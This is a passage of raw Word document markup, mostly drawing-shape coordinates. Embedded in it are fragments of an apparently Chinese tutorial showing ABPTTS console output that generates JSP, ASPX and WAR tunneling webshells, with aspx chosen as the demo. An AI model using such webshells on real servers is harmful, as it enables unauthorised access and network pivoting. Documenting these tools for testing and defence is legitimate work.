40,6484,2440,6486,2440,6489,2440,6492,2440,6495,2440,6498,2440,6501,2440,6504,2440,6507,2440,6510,2440,6514,2440,6517,2440,6520,2440,6524,2440,6528,2440,6531,2440,6535,2440,6539,2440,6543,2440,6547,2440,6551,2440,6555,2440,6560,2440,6564,2440,6569,2440,6573,2440,6578,2440,6583,2440,6588,2440,6592,2440,6598,2440,6603,2440,6608,2440,6613,2440,6619,2440,6624,2440,6630,2440,6636,2440,6642,2440,6647,2440,6654,2440,6660,2440,6666,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2440,6672,2439,6672,2439,6672,2439,6672,2439,6672,2439,6672,2439,6672,2439,6672,2438,6672,2438,6672,2438,6672,2438,6672,2438,6672,2437,6672,2437,6672,2437,6672,2437,6672,2436,6672,2436,6672,2436,6672,2435,6672,2435,6672,2435,6672,2434,6672,2434,6672,2433,6672,2433,6672,2432,6672,2432,6672,2431,6672,2431,6672,2430,6672,2430,6672,2429,6672,2428,6672,2428,6672,2427,6672,2426,6672,2426,6672,2425,6672,2424,6672,2423,6672,2422,6672,2422,6672,2421,6672,2420,6672,2419,6672,2418,6672,2417,6672,2416,6672,2415,6672,2414,6672,2413,6672,2411,6672,2410,6672,2409,6672,2408,6672,2406,6672,2405,6672,2404,6672,2402,6672,2401,6672,2399,6672,2398,6672,2396,6672,2395,6672,2393,6672,2392,6672,2390,6672,2388,6672,2387,6672,2385,6672,2383,6672,2381,6672,2379,6672,2377,6672,2375,6672,2373,6672,2371,6672,2369,6672,2367,6672,2365,6672,2362,6672,2360,6672,2358,6672,2355,6672,2353,6672,2350,6672,2348,6672,2345,6672,2343,6672,2340,6672,2337,6672,2335,6672,2332,6672,2329,6672,2326,6672,2323,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6672,2320,6671,2320,6671,2320,6671,2320,6671,2320,6671,2320,6671,2320,6670,2320,6670,2320,6670,2320,6669,2320,6669,2320,6669,2320,6668,2320,6668,2320,6667,2320,6667,2320,6666,2320,6666,2320,6665,2320,6665,2320,6664,2320,6663,2320,6663,2320,6662,2320,6661,2320,6660,2320,6659,2320,6659,2320,6658,2320,6657,2320,6656,2320,6655,2320,6653,2320,6652,2320,6651,2320,6650,2320,6649,2320,6647,2320,6646,2320,6644,2320,6643,2320,6641,2320,6640,2320,6638,2320,6636,2320,6635,2320,6633,2320,6631,2320,6629,2320,6627,2320,6625,2320,6623,2320,6620,2320,6618,2320,6616,2320,6613,2320,6611,2320,6608,2320,6606,2320,6603,2320,6601,2320,6598,2320,6595,2320,6592,2320,6589,2320,6586,2320,6583,2320,6579,2320,6576,2320,6573,2320,6569,2320,6566,2320,6562,2320,6558,2320,6554,2320,6551,2320,6547,2320,6543,2320,6538,2320,6534,2320,6530,2320,6525,2320,6521,2320,6516,2320,6512,2320,6507,2320,6502,2320,6497,2320,6492,2320,6487,2320,6482,2320,6476,2320,6471,2320,6465,2320,6460,2320,6454,2320,6448,2320,6442,2320,6436,2320,6430,2320,6424,2320,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:157.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3150,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:3150;top:6390;width:130;height:270" coordorigin="3150,6390" coordsize="130,270" path="m3161,6417l3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3162,6417,3162,6417,3162,6417,3162,6417,3162,6417,3162,6417,3163,6417,3163,6417,3163,6417,3163,6417,3163,6417,3164,6417,3164,6417,3164,6417,3165,6417,3165,6417,3165,6417,3166,6417,3166,6417,3166,6417,3167,6417,3167,6417,3168,6417,3168,6417,3168,6417,3169,6417,3169,6417,3170,6417,3171,6417,3171,6417,3172,6417,3172,6417,3173,6417,3174,6417,3174,6417,3175,6417,3176,6417,3177,6417,3178,6417,3178,6417,3179,6417,3180,6417,3181,6417,3182,6417,3183,6417,3184,6417,3185,6417,3186,6417,3187,6417,3188,6417,3189,6417,3191,6417,3192,6417,3193,6417,3194,6417,3196,6417,3197,6417,3198,6417,3200,6417,3201,6417,3203,6417,3204,6417,3206,6417,3208,6417,3209,6417,3211,6417,3213,6417,3214,6417,3216,6417,3218,6417,3220,6417,3222,6417,3224,6417,3226,6417,3228,6417,3230,6417,3232,6417,3234,6417,3236,6417,3238,6417,3241,6417,3243,6417,3245,6417,3248,6417,3250,6417,3253,6417,3255,6417,3258,6417,3261,6417,3263,6417,3266,6417,3269,6417,3272,6417,3275,6417,3278,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6417,3281,6418,3281,6418,3281,6418,3281,6418,3281,6418,3281,6418,3281,6418,3281,6418,3281,6419,3281,6419,3281,6419,3281,6419,3281,6420,3281,6420,3281,6420,3281,6421,3281,6421,3281,6421,3281,6422,3281,6422,3281,6423,3281,6423,3281,6424,3281,6424,3281,6425,3281,6426,3281,6426,3281,6427,3281,6428,3281,6428,3281,6429,3281,6430,3281,6431,3281,6432,3281,6433,3281,6434,3281,6435,3281,6436,3281,6437,3281,6439,3281,6440,3281,6441,3281,6442,3281,6444,3281,6445,3281,6447,3281,6448,3281,6450,3281,6452,3281,6453,3281,6455,3281,6457,3281,6459,3281,6461,3281,6463,3281,6465,3281,6467,3281,6469,3281,6471,3281,6474,3281,6476,3281,6479,3281,6481,3281,6484,3281,6486,3281,6489,3281,6492,3281,6495,3281,6498,3281,6501,3281,6504,3281,6507,3281,6510,3281,6514,3281,6517,3281,6520,3281,6524,3281,6528,3281,6531,3281,6535,3281,6539,3281,6543,3281,6547,3281,6551,3281,6555,3281,6560,3281,6564,3281,6569,3281,6573,3281,6578,3281,6583,3281,6588,3281,6592,3281,6598,3281,6603,3281,6608,3281,6613,3281,6619,3281,6624,3281,6630,3281,6636,3281,6642,3281,6647,3281,6654,3281,6660,3281,6666,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3281,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3280,6672,3279,6672,3279,6672,3279,6672,3279,6672,3279,6672,3279,6672,3278,6672,3278,6672,3278,6672,3278,6672,3277,6672,3277,6672,3277,6672,3276,6672,3276,6672,3276,6672,3275,6672,3275,6672,3275,6672,3274,6672,3274,6672,3273,6672,3273,6672,3272,6672,3272,6672,3271,6672,3271,6672,3270,6672,3269,6672,3269,6672,3268,6672,3267,6672,3267,6672,3266,6672,3265,6672,3264,6672,3264,6672,3263,6672,3262,6672,3261,6672,3260,6672,3259,6672,3258,6672,3257,6672,3256,6672,3255,6672,3254,6672,3253,6672,3252,6672,3251,6672,3249,6672,3248,6672,3247,6672,3246,6672,3244,6672,3243,6672,3241,6672,3240,6672,3238,6672,3237,6672,3235,6672,3234,6672,3232,6672,3230,6672,3229,6672,3227,6672,3225,6672,3223,6672,3221,6672,3220,6672,3218,6672,3216,6672,3214,6672,3212,6672,3209,6672,3207,6672,3205,6672,3203,6672,3201,6672,3198,6672,3196,6672,3193,6672,3191,6672,3188,6672,3186,6672,3183,6672,3181,6672,3178,6672,3175,6672,3172,6672,3169,6672,3167,6672,3164,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6672,3161,6671,3161,6671,3161,6671,3161,6671,3161,6671,3161,6671,3161,6670,3161,6670,3161,6670,3161,6669,3161,6669,3161,6669,3161,6668,3161,6668,3161,6667,3161,6667,3161,6666,3161,6666,3161,6665,3161,6665,3161,6664,3161,6663,3161,6663,3161,6662,3161,6661,3161,6660,3161,6659,3161,6659,3161,6658,3161,6657,3161,6656,3161,6655,3161,6653,3161,6652,3161,6651,3161,6650,3161,6649,3161,6647,3161,6646,3161,6644,3161,6643,3161,6641,3161,6640,3161,6638,3161,6636,3161,6635,3161,6633,3161,6631,3161,6629,3161,6627,3161,6625,3161,6623,3161,6620,3161,6618,3161,6616,3161,6613,3161,6611,3161,6608,3161,6606,3161,6603,3161,6601,3161,6598,3161,6595,3161,6592,3161,6589,3161,6586,3161,6583,3161,6579,3161,6576,3161,6573,3161,6569,3161,6566,3161,6562,3161,6558,3161,6554,3161,6551,3161,6547,3161,6543,3161,6538,3161,6534,3161,6530,3161,6525,3161,6521,3161,6516,3161,6512,3161,6507,3161,6502,3161,6497,3161,6492,3161,6487,3161,6482,3161,6476,3161,6471,3161,6465,3161,6460,3161,6454,3161,6448,3161,6442,3161,6436,3161,6430,3161,6424,3161,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:211.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4230,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:4230;top:6390;width:130;height:270" coordorigin="4230,6390" coordsize="130,270" path="m4241,6417l4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4241,6417,4242,6417,4242,6417,4242,6417,4242,6417,4242,6417,4242,6417,4242,6417,4242,6417,4242,6417,4243,6417,4243,6417,4243,6417,4243,6417,4243,6417,4243,6417,4244,6417,4244,6417,4244,6417,4244,6417,4245,6417,4245,6417,4245,6417,4246,6417,4246,6417,4246,6417,4247,6417,4247,6417,4248,6417,4248,6417,4249,6417,4249,6417,4250,6417,4250,6417,4251,6417,4251,6417,4252,6417,4252,6417,4253,6417,4254,6417,4254,6417,4255,6417,4256,6417,4257,6417,4257,6417,4258,6417,4259,6417,4260,6417,4261,6417,4262,6417,4263,6417,4264,6417,4265,6417,4266,6417,4267,6417,4268,6417,4269,6417,4270,6417,4271,6417,4272,6417,4274,6417,4275,6417,4276,6417,4278,6417,4279,6417,4280,6417,4282,6417,4283,6417,4285,6417,4286,6417,4288,6417,4290,6417,4291,6417,4293,6417,4295,6417,4297,6417,4298,6417,4300,6417,4302,6417,4304,6417,4306,6417,4308,6417,4310,6417,4312,6417,4315,6417,4317,6417,4319,6417,4321,6417,4324,6417,4326,6417,4328,6417,4331,6417,4333,6417,4336,6417,4339,6417,4341,6417,4344,6417,4347,6417,4349,6417,4352,6417,4355,6417,4358,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6417,4361,6418,4361,6418,4361,6418,4361,6418,4361,6418,4361,6418,4361,6418,4361,6418,4361,6419,4361,6419,4361,6419,4361,6419,4361,6420,4361,6420,4361,6420,4361,6421,4361,6421,4361,6421,4361,6422,4361,6422,4361,6423,4361,6423,4361,6424,4361,6424,4361,6425,4361,6426,4361,6426,4361,6427,4361,6428,4361,6428,4361,6429,4361,6430,4361,6431,4361,6432,4361,6433,4361,6434,4361,6435,4361,6436,4361,6437,4361,6439,4361,6440,4361,6441,4361,6442,4361,6444,4361,6445,4361,6447,4361,6448,4361,6450,4361,6452,4361,6453,4361,6455,4361,6457,4361,6459,4361,6461,4361,6463,4361,6465,4361,6467,4361,6469,4361,6471,4361,6474,4361,6476,4361,6479,4361,6481,4361,6484,4361,6486,4361,6489,4361,6492,4361,6495,4361,6498,4361,6501,4361,6504,4361,6507,4361,6510,4361,6514,4361,6517,4361,6520,4361,6524,4361,6528,4361,6531,4361,6535,4361,6539,4361,6543,4361,6547,4361,6551,4361,6555,4361,6560,4361,6564,4361,6569,4361,6573,4361,6578,4361,6583,4361,6588,4361,6592,4361,6598,4361,6603,4361,6608,4361,6613,4361,6619,4361,6624,4361,6630,4361,6636,4361,6642,4361,6647,4361,6654,4361,6660,4361,6666,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4361,6672,4360,6672,4360,6672,4360,6672,4360,6672,4360,6672,4360,6672,4360,6672,4359,6672,4359,6672,4359,6672,4359,6672,4359,6672,4358,6672,4358,6672,4358,6672,4358,6672,4357,6672,4357,6672,4357,6672,4356,6672,4356,6672,4356,6672,4355,6672,4355,6672,4354,6672,4354,6672,4353,6672,4353,6672,4352,6672,4352,6672,4351,6672,4351,6672,4350,6672,4349,6672,4349,6672,4348,6672,4347,6672,4347,6672,4346,6672,4345,6672,4344,6672,4343,6672,4343,6672,4342,6672,4341,6672,4340,6672,4339,6672,4338,6672,4337,6672,4336,6672,4335,6672,4333,6672,4332,6672,4331,6672,4330,6672,4329,6672,4327,6672,4326,6672,4325,6672,4323,6672,4322,6672,4320,6672,4319,6672,4317,6672,4316,6672,4314,6672,4313,6672,4311,6672,4309,6672,4308,6672,4306,6672,4304,6672,4302,6672,4300,6672,4298,6672,4296,6672,4294,6672,4292,6672,4290,6672,4288,6672,4286,6672,4283,6672,4281,6672,4279,6672,4276,6672,4274,6672,4271,6672,4269,6672,4266,6672,4264,6672,4261,6672,4258,6672,4256,6672,4253,6672,4250,6672,4247,6672,4244,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6672,4241,6671,4241,6671,4241,6671,4241,6671,4241,6671,4241,6671,4241,6670,4241,6670,4241,6670,4241,6669,4241,6669,4241,6669,4241,6668,4241,6668,4241,6667,4241,6667,4241,6666,4241,6666,4241,6665,4241,6665,4241,6664,4241,6663,4241,6663,4241,6662,4241,6661,4241,6660,4241,6659,4241,6659,4241,6658,4241,6657,4241,6656,4241,6655,4241,6653,4241,6652,4241,6651,4241,6650,4241,6649,4241,6647,4241,6646,4241,6644,4241,6643,4241,6641,4241,6640,4241,6638,4241,6636,4241,6635,4241,6633,4241,6631,4241,6629,4241,6627,4241,6625,4241,6623,4241,6620,4241,6618,4241,6616,4241,6613,4241,6611,4241,6608,4241,6606,4241,6603,4241,6601,4241,6598,4241,6595,4241,6592,4241,6589,4241,6586,4241,6583,4241,6579,4241,6576,4241,6573,4241,6569,4241,6566,4241,6562,4241,6558,4241,6554,4241,6551,4241,6547,4241,6543,4241,6538,4241,6534,4241,6530,4241,6525,4241,6521,4241,6516,4241,6512,4241,6507,4241,6502,4241,6497,4241,6492,4241,6487,4241,6482,4241,6476,4241,6471,4241,6465,4241,6460,4241,6454,4241,6448,4241,6442,4241,6436,4241,6430,4241,6424,4241,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:374.399pt;width:467.400pt;height:198.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28.132722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Client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side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configuration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will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itten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as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"/root/ABPTTS/webshell/config.txt"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28.132739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"/root/ABPTTS/data/american‐english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‐lowercase‐4‐64.txt"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as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wordlist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file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28.136713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configuration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"/root/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ABPTTS/web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shell/config.txt"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28.137760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"/root/ABPTTS/webshel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l/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abptts.jsp"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28.138342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"/root/ABPTTS/webshel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l/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abptts.aspx"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28.138492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"/root/ABPTTS/webshel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l/war/W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EB‐INF/web.xml"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28.138555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"/root/ABPTTS/webshel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l/war/META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‐INF/MANIFEST.MF"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28.139128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Prebuilt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JSP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WAR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file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ABPTTS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websh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ell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scabGroup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war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302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28.139140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Unpacked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WAR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contents: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root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ABPTTS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webshell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war</w:t>
      </w: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0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>以a</w:t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spx为demo。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291.500pt;width:0.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,5830" coordsize="10,690">
        <v:shape style="position:absolute;left:10390;top:5830;width:10;height:690" coordorigin="10390,5830" coordsize="10,690" path="m10402,5847l10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5848,10402,5848,10402,5848,10402,5848,10402,5849,10402,5849,10402,5849,10402,5850,10402,5850,10402,5851,10402,5851,10402,5852,10402,5852,10402,5853,10402,5854,10402,5855,10402,5856,10402,5857,10402,5858,10402,5859,10402,5860,10402,5861,10402,5863,10402,5864,10402,5866,10402,5867,10402,5869,10402,5871,10402,5873,10402,5875,10402,5877,10402,5879,10402,5881,10402,5883,10402,5886,10402,5889,10402,5891,10402,5894,10402,5897,10402,5900,10402,5903,10402,5907,10402,5910,10402,5914,10402,5917,10402,5921,10402,5925,10402,5929,10402,5934,10402,5938,10402,5942,10402,5947,10402,5952,10402,5957,10402,5962,10402,5967,10402,5973,10402,5979,10402,5984,10402,5990,10402,5997,10402,6003,10402,6009,10402,6016,10402,6023,10402,6030,10402,6037,10402,6045,10402,6052,10402,6060,10402,6068,10402,6076,10402,6084,10402,6093,10402,6102,10402,6111,10402,6120,10402,6129,10402,6139,10402,6149,10402,6159,10402,6169,10402,6180,10402,6191,10402,6202,10402,6213,10402,6224,10402,6236,10402,6248,10402,6260,10402,6272,10402,6285,10402,6298,10402,6311,10402,6324,10402,6338,10402,6352,10402,6366,10402,6380,10402,6395,10402,6410,10402,6425,10402,6441,10402,6456,10402,6472,10402,6489,10402,6505,10402,6522e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:291.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,5830" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:5830;width:8990;height:690" coordorigin="1490,5830" coordsize="8990,690" path="m1510,5847l1510,5847,1510,5847,1510,5847,1510,5847,1510,5847,1510,5847,1511,5847,1512,5847,1512,5847,1514,5847,1515,5847,1517,5847,1519,5847,1521,5847,1524,5847,1528,5847,1532,5847,1536,5847,1541,5847,1546,5847,1552,5847,1559,5847,1566,5847,1575,5847,1583,5847,1593,5847,1603,5847,1615,5847,1627,5847,1640,5847,1654,5847,1668,5847,1684,5847,1701,5847,1719,5847,1738,5847,1758,5847,1780,5847,1802,5847,1826,5847,1851,5847,1877,5847,1904,5847,1933,5847,1963,5847,1995,5847,2028,5847,2063,5847,2099,5847,2136,5847,2175,5847,2216,5847,2259,5847,2303,5847,2348,5847,2396,5847,2445,5847,2496,5847,2549,5847,2604,5847,2660,5847,2719,5847,2779,5847,2841,5847,2906,5847,2972,5847,3041,5847,3112,5847,3184,5847,3259,5847,3336,5847,3416,5847,3498,5847,3582,5847,3668,5847,3757,5847,3848,5847,3941,5847,4037,5847,4136,5847,4236,5847,4340,5847,4446,5847,4555,5847,4666,5847,4780,5847,4897,5847,5017,5847,5139,5847,5264,5847,5392,5847,5523,5847,5657,5847,5793,5847,5933,5847,6076,5847,6222,5847,6370,5847,6522,5847,6677,5847,6835,5847,6997,5847,7161,5847,7329,5847,7500,5847,7675,5847,7853,5847,8034,5847,8219,5847,8407,5847,8598,5847,8793,5847,8992,5847,9194,5847,9400,5847,9609,5847,9823,5847,10039,5847,10260,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5848,10484,5848,10484,5848,10484,5848,10484,5849,10484,5849,10484,5849,10484,5850,10484,5850,10484,5851,10484,5851,10484,5852,10484,5852,10484,5853,10484,5854,10484,5855,10484,5856,10484,5857,10484,5858,10484,5859,10484,5860,10484,5861,10484,5863,10484,5864,10484,5866,10484,5867,10484,5869,10484,5871,10484,5873,10484,5875,10484,5877,10484,5879,10484,5881,10484,5883,10484,5886,10484,5889,10484,5891,10484,5894,10484,5897,10484,5900,10484,5903,10484,5907,10484,5910,10484,5914,10484,5917,10484,5921,10484,5925,10484,5929,10484,5934,10484,5938,10484,5942,10484,5947,10484,5952,10484,5957,10484,5962,10484,5967,10484,5973,10484,5979,10484,5984,10484,5990,10484,5997,10484,6003,10484,6009,10484,6016,10484,6023,10484,6030,10484,6037,10484,6045,10484,6052,10484,6060,10484,6068,10484,6076,10484,6084,10484,6093,10484,6102,10484,6111,10484,6120,10484,6129,10484,6139,10484,6149,10484,6159,10484,6169,10484,6180,10484,6191,10484,6202,10484,6213,10484,6224,10484,6236,10484,6248,10484,6260,10484,6272,10484,6285,10484,6298,10484,6311,10484,6324,10484,6338,10484,6352,10484,6366,10484,6380,10484,6395,10484,6410,10484,6425,10484,6441,10484,6456,10484,6472,10484,6489,10484,6505,10484,6522,10484,6522,10484,6522,10484,6522,10484,6522,10484,6522,10484,6522,10483,6522,10482,6522,10482,6522,10480,6522,10479,6522,10477,6522,10475,6522,10473,6522,10470,6522,10466,6522,10462,6522,10458,6522,10453,6522,10448,6522,10442,6522,10435,6522,10428,6522,10419,6522,10411,6522,10401,6522,10391,6522,10379,6522,10367,6522,10354,6522,10340,6522,10326,6522,10310,6522,10293,6522,10275,6522,10256,6522,10236,6522,10215,6522,10192,6522,10168,6522,10143,6522,10117,6522,10090,6522,10061,6522,10031,6522,9999,6522,9966,6522,9931,6522,9895,6522,9858,6522,9819,6522,9778,6522,9735,6522,9691,6522,9646,6522,9598,6522,9549,6522,9498,6522,9445,6522,9391,6522,9334,6522,9275,6522,9215,6522,9153,6522,9088,6522,9022,6522,8953,6522,8883,6522,8810,6522,8735,6522,8658,6522,8578,6522,8497,6522,8413,6522,8326,6522,8238,6522,8146,6522,8053,6522,7957,6522,7859,6522,7758,6522,7654,6522,7548,6522,7439,6522,7328,6522,7214,6522,7097,6522,6977,6522,6855,6522,6730,6522,6602,6522,6471,6522,6337,6522,6201,6522,6061,6522,5918,6522,5773,6522,5624,6522,5472,6522,5317,6522,5159,6522,4997,6522,4833,6522,4665,6522,4494,6522,4319,6522,4141,6522,3960,6522,3776,6522,3587,6522,3396,6522,3201,6522,3002,6522,2800,6522,2594,6522,2385,6522,2172,6522,1955,6522,1734,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6521,1510,6521,1510,6521,1510,6521,1510,6520,1510,6520,1510,6520,1510,6519,1510,6519,1510,6518,1510,6517,1510,6517,1510,6516,1510,6515,1510,6514,1510,6513,1510,6513,1510,6511,1510,6510,1510,6509,1510,6508,1510,6507,1510,6505,1510,6504,1510,6502,1510,6500,1510,6499,1510,6497,1510,6495,1510,6493,1510,6490,1510,6488,1510,6486,1510,6483,1510,6481,1510,6478,1510,6475,1510,6472,1510,6469,1510,6466,1510,6463,1510,6459,1510,6456,1510,6452,1510,6448,1510,6444,1510,6440,1510,6436,1510,6431,1510,6427,1510,6422,1510,6417,1510,6412,1510,6407,1510,6402,1510,6396,1510,6391,1510,6385,1510,6379,1510,6373,1510,6366,1510,6360,1510,6353,1510,6346,1510,6339,1510,6332,1510,6325,1510,6317,1510,6309,1510,6301,1510,6293,1510,6285,1510,6276,1510,6267,1510,6258,1510,6249,1510,6240,1510,6230,1510,6220,1510,6210,1510,6200,1510,6189,1510,6179,1510,6168,1510,6157,1510,6145,1510,6133,1510,6122,1510,6109,1510,6097,1510,6084,1510,6071,1510,6058,1510,6045,1510,6031,1510,6017,1510,6003,1510,5989,1510,5974,1510,5959,1510,5944,1510,5929,1510,5913,1510,5897,1510,5880,1510,5864,1510,5847e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:291.600pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:347.149pt;width:0.0pt;height:494.850pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,6942" coordsize="0,9897">
        <v:shape style="position:absolute;left:10402;top:6942;width:0;height:9897" coordorigin="10402,6942" coordsize="0,9897" path="m10402,6942l10402,6942,10402,6943,10402,6943,10402,6943,10402,6943,10402,6943,10402,6944,10402,6945,10402,6946,10402,6947,10402,6948,10402,6950,10402,6953,10402,6955,10402,6959,10402,6962,10402,6967,10402,6971,10402,6977,10402,6983,10402,6989,10402,6997,10402,7005,10402,7014,10402,7024,10402,7034,10402,7046,10402,7058,10402,7071,10402,7086,10402,7101,10402,7117,10402,7135,10402,7154,10402,7173,10402,7194,10402,7217,10402,7240,10402,7265,10402,7291,10402,7318,10402,7347,10402,7378,10402,7409,10402,7443,10402,7478,10402,7514,10402,7552,10402,7592,10402,7633,10402,7677,10402,7722,10402,7768,10402,7817,10402,7867,10402,7920,10402,7974,10402,8030,10402,8088,10402,8149,10402,8211,10402,8276,10402,8342,10402,8411,10402,8482,10402,8555,10402,8631,10402,8709,10402,8789,10402,8872,10402,8957,10402,9045,10402,9135,10402,9227,10402,9322,10402,9420,10402,9521,10402,9624,10402,9730,10402,9838,10402,9949,10402,10064,10402,10181,10402,10301,10402,10423,10402,10549,10402,10678,10402,10810,10402,10945,10402,11083,10402,11224,10402,11368,10402,11516,10402,11667,10402,11821,10402,11978,10402,12139,10402,12303,10402,12470,10402,12641,10402,12816,10402,12993,10402,13175,10402,13360,10402,13549,10402,13741,10402,13937,10402,14137,10402,14341,10402,14548,10402,14760,10402,14975,10402,15194,10402,15417,10402,15644,10402,15875,10402,16110,10402,16349,10402,16592,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:346.500pt;width:449.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6930" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:6930;width:8990;height:910" coordorigin="1490,6930" coordsize="8990,910" path="m1510,6942l1510,6942,1510,6942,1510,6942,1510,6942,1510,6942,1510,6942,1511,6942,1512,6942,1512,6942,1514,6942,1515,6942,1517,6942,1519,6942,1521,6942,1524,6942,1528,6942,1532,6942,1536,6942,1541,6942,1546,6942,1552,6942,1559,6942,1566,6942,1575,6942,1583,6942,1593,6942,1603,6942,1615,6942,1627,6942,1640,6942,1654,6942,1668,6942,1684,6942,1701,6942,1719,6942,1738,6942,1758,6942,1780,6942,1802,6942,1826,6942,1851,6942,1877,6942,1904,6942,1933,6942,1963,6942,1995,6942,2028,6942,2063,6942,2099,6942,2136,6942,2175,6942,2216,6942,2259,6942,2303,6942,2348,6942,2396,6942,2445,6942,2496,6942,2549,6942,2604,6942,2660,6942,2719,6942,2779,6942,2841,6942,2906,6942,2972,6942,3041,6942,3112,6942,3184,6942,3259,6942,3336,6942,3416,6942,3498,6942,3582,6942,3668,6942,3757,6942,3848,6942,3941,6942,4037,6942,4136,6942,4236,6942,4340,6942,4446,6942,4555,6942,4666,6942,4780,6942,4897,6942,5017,6942,5139,6942,5264,6942,5392,6942,5523,6942,5657,6942,5793,6942,5933,6942,6076,6942,6222,6942,6370,6942,6522,6942,6677,6942,6835,6942,6997,6942,7161,6942,7329,6942,7500,6942,7675,6942,7853,6942,8034,6942,8219,6942,8407,6942,8598,6942,8793,6942,8992,6942,9194,6942,9400,6942,9609,6942,9823,6942,10039,6942,10260,6942,10484,6942,10484,6942,10484,6942,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6944,10484,6944,10484,6944,10484,6945,10484,6945,10484,6946,10484,6946,10484,6947,10484,6948,10484,6948,10484,6949,10484,6950,10484,6951,10484,6952,10484,6953,10484,6954,10484,6956,10484,6957,10484,6959,10484,6960,10484,6962,10484,6964,10484,6966,10484,6968,10484,6970,10484,6972,10484,6975,10484,6977,10484,6980,10484,6983,10484,6986,10484,6989,10484,6992,10484,6995,10484,6999,10484,7003,10484,7006,10484,7010,10484,7015,10484,7019,10484,7023,10484,7028,10484,7033,10484,7038,10484,7043,10484,7048,10484,7054,10484,7060,10484,7066,10484,7072,10484,7078,10484,7085,10484,7092,10484,7099,10484,7106,10484,7113,10484,7121,10484,7129,10484,7137,